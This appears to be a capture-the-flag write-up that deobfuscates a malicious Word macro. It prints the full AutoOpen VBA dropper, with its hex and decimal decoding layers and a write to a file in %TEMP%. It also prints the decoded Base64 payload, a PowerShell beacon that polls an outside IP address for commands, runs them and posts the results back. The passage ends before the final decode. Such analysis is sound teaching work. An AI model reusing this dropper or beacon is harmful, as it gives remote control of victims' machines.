|Hex String|65 74 119 65 112 65 |363520373420313139203635203131322036352036372|
| |67 65 65 101 119 65 |036352036352031303120313139203635203130372036|
| |107 65 72 73 65 80 |352037322037332036352038302038312036362031313|
| |81 66 112 65 |220363520 |
|Hex String|71 85 65 101 |373120383520363520313031 |
|Hex String|65 65 103 |36352036352031303320 |
|Hex String|65 67 81 65 89 119 |363520363720383120363520383920313139203635203|
| |65 103 65 67 48 65 |130332036352036372034382036352038322038312036|
| |82 81 66 121 65 72 |362031323120363520373220373320363520393820313|
| |73 65 98 119 66 |139203636 |
|Hex String|121 65 69 69 65 89 |313231203635203639203639203635203839203131392|
| |119 66 48 65 71 107 |036362034382036352037312031303720363520393820|
| |65 98 119 66 117 65 |3131392036362031313720363520 |
|Hex String|67 65 65 85 119 66 |363720363520363520383520313139203636203438203|
| |48 65 |635 |
|Hex String|71 56 65 99 65 65 |373120353620363520393920363520363520313033203|
| |103 65 67 48 65 82 |635203637203438203635203832203831203636203132|
| |81 66 121 |3120 |
|Hex String|65 72 73 65 98 119 |363520373220373320363520393820313139203636203|
| |66 121 65 70 89 |13231203635203730203839 |
|Hex String|65 89 81 66 121 65 |363520383920383120363620313231203635203731203|
| |71 107 65 89 8 |130372036352038392038 |
|Hex String|1 66 105 65 71 119 |312036362031303520363520373120313139203635203|
| |65 90 81 65 103 65 |930203831203635203130332036352037312038352036|
| |71 85 65 79 |35203739 |
|Hex String|119 65 107 65 72 73 |313139203635203130372036352037322037332036352|
| |65 80 81 |0383020383120 |
|Hex String|66 80 65 72 85 65 |363620383020363520373220383520363520313030203|
| |100 65 65 116 65 70 |635203635203131362036352037302037372036352031|
| |77 65 100 65 66 |3030203635203636 |
|Hex String|121 65 7 |3132312036352037 |
|Hex String|1 107 65 98 103 66 |312031303720363520393820313033203636203131302|
| |110 65 67 65 65 76 |036352036372036352036352037362038312036362037|
| |81 66 74 65 71 52 65|342036352037312035322036352039392036352036362|
| |99 65 66 49 65 |03439203635 |
|Hex String|72 81 65 84 119 66 |373220383120363520383420313139203636203130352|
| |105 65 71 111 65 90 |036352037312031313120363520393020383120363620|
| |81 66 106 65 72 81 |313036203635203732203831203635203733203635203|
| |65 73 65 65 107 65 |63520313037203635203732 |
| |72 | |
|Hex String|65 79 119 65 107 65 |363520373920313139203635203130372036352037322|
| |72 81 65 80 81 66 |0383120363520383020383120363620 |
|Hex String|74 65 71 52 65 100 |373420363520373120353220363520313030203130332|
| |103 66 118 65 71 115|036362031313820363520373120313135203635203930|
| |65 90 | |
|Hex String|81 65 116 65 70 73 |383120363520313136203635203730203733203635203|
| |65 90 81 66 122 65 |930203831203636203132322036352037322038312036|
| |72 81 65 84 81 66 10|35203834203831203636203130 |
|Hex String|8 65 72 81 65 97 65 |382036352037322038312036352039372036352036362|
| |66 118 |0313138 |
|Hex String|65 71 81 65 73 |3635203731203831203635203733 |
|Hex String| 65 65 116 65 70 85 |203635203635203131362036352037302038352036352|
| |65 99 103 66 112 65 |039392031303320363620313132203635203637203635|
| |67 65 65 74 65 66 |20363520373420363520363620313139203635203637 |
| |119 65 67 | |
|Hex String|81 65 99 119 65 118 |383120363520393920313139203635203131382036352|
| |65 68 99 65 90 81 66|036382039392036352039302038312036362031303420|
| |104 65 68 73 65 77 |363520363820373320363520373720313139203636203|
| |119 66 104 65 68 73 |1303420363520363820373320 |
|Hex String|89 119 65 103 65 67 |383920313139203635203130332036352036372034382|
| |48 65 84 81 66 108 |036352038342038312036362031303820363520373220|
| |65 72 81 65 97 65 66|383120363520393720363520363620313138203635203|
| |118 65 71 |73120 |
|Hex String|81 65 73 65 |3831203635203733203635 |
|Hex String|66 81 |363620383120 |
|Hex String|65 69 56 65 85 119 |363520363920353620363520383520313139203636203|
| |66 85 65 67 65 65 76|835203635203637203635203635203736203831203636|
| |81 66 73 65 71 85 65|203733203635203731203835203635203839203831203|
| |89 81 66 107 65 |63620313037203635 |
|Hex String|71 85 65 99 103 66 |373120383520363520393920313033203636203132322|
| |122 65 67 65 65 81 |036352036372036352036352038312036352036362035|
| |65 66 55 |35 |
|Hex String| 65 67 73 65 81 81 |203635203637203733203635203831203831203636203|
| |66 49 65 72 81 65 |439203635203732203831203635 |
|Hex String|97 65 66 118 65 72 |393720363520363620313138203635203732203733203|
| |73 65 97 81 66 54 65|635203937203831203636203534203635203731203639|
| |71 69 65 100 65 66 |203635203130302036352036362031313220363520373|
| |112 65 71 56 65 98 |1203536203635203938 |
|Hex String| 103 |20313033 |
|Hex String|65 105 65 68 48 65 |363520313035203635203638203438203635203734203|
| |74 65 66 112 65 72 |635203636203131322036352037322034382036352037|
| |48 65 73 65 65 |3320363520363520 |
|Hex String|116 65 69 73 65 98 |313136203635203639203733203635203938203131392|
| |119 66 107 |0363620313037 |
|Hex String|65 72 |363520373220 |
|Hex String|107 65 73 65 65 111 |313037203635203733203635203635203131312036352|
| |65 70 115 65 85 119 |037302031313520363520383520313139203636203533|
| |66 53 65 72 77 65 |203635203732203737203635203130302036352036362|
| |100 65 66 108 65 71 |0313038203635203731 |
|Hex String|48 65 |3438203635 |
|Hex String| 76 103 66 85 65 71 |203736203130332036362038352036352037312038352|
| |85 65 101 65 66 48 |036352031303120363520363620343820363520363720|
| |65 67 52 65 82 81 66|353220363520383220383120363620313137203635203|
| |117 65 71 77 65 98 |731203737203635203938 |
|Hex String|119 66 107 65 71 107|313139203636203130372036352037312031303720363|
| |65 98 103 66 110 65 |520393820313033203636203131302036352037302034|
| |70 48 65 79 103 65 |382036352037392031303320363520353420363520373|
| |54 65 70 85 65 |0203835203635 |
|Hex String| 86 65 66 |203836203635203636 |
|Hex String|71 65 68 103 65 76 |373120363520363820313033203635203736203130332|
| |103 66 72 65 71 |03636203732203635203731 |
|Hex String| 85 65 100 65 66 67 |203835203635203130302036352036362036372036352|
| |65 72 107 65 100 65 |037322031303720363520313030203635203636203130|
| |66 108 65 |38203635 |
|Hex String|72 77 65 75 65 65 |373220373720363520373520363520363520313037203|
| |107 65 71 85 65 75 |635203731203835203635203735203131392036352031|
| |119 65 107 65 72 73 |303720363520373220373320363520373520383120363|
| |65 75 81 65 |5 |
|Hex String| 103 65 67 48 |20313033203635203637203438 |
|Hex String|65 97 103 66 |36352039372031303320363620 |
|Hex String|118 65 71 107 65 98 |313138203635203731203130372036352039382031303|
| |103 65 103 65 67 99 |320363520313033203635203637203939203635203733|
| |65 73 65 65 110 65 |203635203635203131302036352036372031303720363|
| |67 107 65 |5 |
|Hex String| 81 65 103 65 72 77 |203831203635203130332036352037322037372036352|
| |65 98 65 66 108 65 |039382036352036362031303820363520373120383520|
| |71 85 65 99 65 65 |363520393920363520363520313033203635203638203|
| |103 65 68 65 65 76 |63520363520373620313033 |
| |103 | |
|Hex String|65 52 65 72 48 65 83|363520353220363520373220343820363520383320363|
| |65 66 |520363620 |
|Hex String|85 65 69 73 65 101 |383520363520363920373320363520313031203131392|
| |119 65 49 65 72 85 |036352034392036352037322038352036352039392036|
| |65 99 65 65 122 65 |3520363520313232203635 |
|Hex String|72 73 65 88 119 65 |373220373320363520383820313139203635203132322|
| |122 65 68 81 65 78 8|036352036382038312036352037382038 |
|Hex String|1 66 53 65 70 56 65 |312036362035332036352037302035362036352039382|
| |98 81 65 48 65 71 77|03831203635203438203635203731203737203635 |
| |65 | |
|Hex String|99 103 65 119 65 68 |393920313033203635203131392036352036382038352|
| |85 65 102 81 |036352031303220383120 |
|Hex String|65 61 |3635203631 |
|Hex String|Scripting.FileSyst |536372697074696e672e46696c6553797374 |
|Hex String|emObject |656d4f626a656374 |
|Hex String|istory.bak |6973746f72792e62616b |
+----------+--------------------+---------------------------------------------+
VBA script deobfuscation
We are interested in the above VBA scripts. Let’s start with the shortest one:
' Hex-string decoder: walks the input two characters at a time, parses each
' pair as a hexadecimal byte (Val("&H..")) and appends the matching character,
' e.g. "53637269707469" -> "Scripti". The macro uses it to hide COM object
' names, the drop file name and the payload chunks from plain string scans.
Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
Dim nqjveawetp As Long
' Step 2: one two-digit hex pair per iteration.
For nqjveawetp = 1 To Len(tiyrahvbz) Step 2
uxdufnkjlialsyp = uxdufnkjlialsyp & Chr$(Val("&H" & Mid$(tiyrahvbz, nqjveawetp, 2)))
Next nqjveawetp
End Function
It seems to apply some kind of transformation to the string tiyrahvbz
passed as an argument.
Then we have a large VBA script. I’ll break it down into smaller pieces. These are the first functions:
' Auto-executing entry point: Word runs AutoOpen when the document is opened
' (once macros are enabled), so this is the first code that executes.
Sub AutoOpen()
' Stage 1: decode the embedded payload and write it to %TEMP%\history.bak.
odhsjwpphlxnb
' Stage 2: lmavedb is defined outside this excerpt.
Call lmavedb
End Sub
' Dropper: rebuilds the obfuscated payload string and writes it to disk.
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
' Point the shell's working directory at %TEMP%.
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
' Payload text, assembled from the hex/decimal-encoded chunks in okbzichkqtto.
bnhupraoau = sryivxjsdncj()
dropPath = Environ("TEMP")
' The two hex pieces decode to "Scripting.FileSystemObject"; splitting the
' name across two calls keeps the literal out of simple string searches.
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
' "5c68697374" & "6f72792e62616b" decode to "\history.bak", so the file is
' created as %TEMP%\history.bak (True = overwrite if it already exists).
' Detection note: a Word process creating this file in %TEMP% is the
' observable artefact of this stage.
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
The function named AutoOpen
is executed first, and it calls odhsjwpphlxnb
and lmavedb
. The former calls sryivxjsdncj
:
' Thin wrapper: returns the payload string built by okbzichkqtto.
' The "" initialisation and the + concatenation add nothing to the result;
' they look like obfuscator noise.
Private Function sryivxjsdncj() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
sryivxjsdncj = fxnrfzsdxmcvranp
End Function
And there’s another call to okbzichkqtto
, which is a huge function:
' Payload builder. Every line appends one chunk of the final string:
' uxdufnkjlialsyp() decodes the hex literal into a run of space-separated
' decimal character codes, and wdysllqkgsbzs() maps those codes back to
' characters. Concatenated, the chunks form the Base64 text shown later in
' the write-up (it begins "JABzAD0AJ...").
Private Function okbzichkqtto() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
' First chunk: the hex decodes to "74 65 66 122 65 68 48 65 74 1..." which
' wdysllqkgsbzs turns into "JABzAD0AJ".
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
' Last chunk ends in "65 61" -> "A=", the Base64 padding at the end of the payload.
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
okbzichkqtto = fxnrfzsdxmcvranp
End Function
Recognizing patterns
We don’t actually need to know Visual Basic for Applications (VBA), we only need to find suspicious patterns. For instance, function okbzichkqtto
contains a lot of strings that are encoded in hexadecimal format. We can take one of them and decode it:
$ echo 3734203635203636203132322036352036382034382036352037342031 | xxd -r -p
74 65 66 122 65 68 48 65 74 1
Now we have numbers. Maybe they are ASCII character codes, let’s have a look:
$ python3 -q
>>> ''.join(map(lambda n: chr(int(n)), '74 65 66 122 65 68 48 65 74'.split()))
'JABzAD0AJ'
It does not look very promising…
Finding the output
Notice that the above example was for a single string. In the huge function, there are a lot of strings being concatenated using the +
or &
operator (both of which concatenate strings in VBA).
Actually, if we read function uxdufnkjlialsyp
again, it is clear that it decodes the input string from its hexadecimal representation. Then, wdysllqkgsbzs
turns the resulting space-separated decimal character codes into characters:
' Second decoding layer: takes a string of space-separated decimal character
' codes (e.g. "74 65 66") and returns the characters they encode ("JAB").
' Split() with no delimiter argument splits on spaces.
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
' One array element per code.
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
' Chr() coerces the numeric string to a number before converting it.
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
So, we can adapt the above code in Python easily and find the output of the huge function:
$ python3 solve.py
JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=
This script can be found here: solve.py
.
Flag
Now we recognize the output as Base64-encoded data, so let’s decode it and find the flag. The decoded payload is a PowerShell script stored as UTF-16LE text, which is why the second command strips the null bytes with tr before grepping for the flag:
$ python3 solve.py | base64 -d
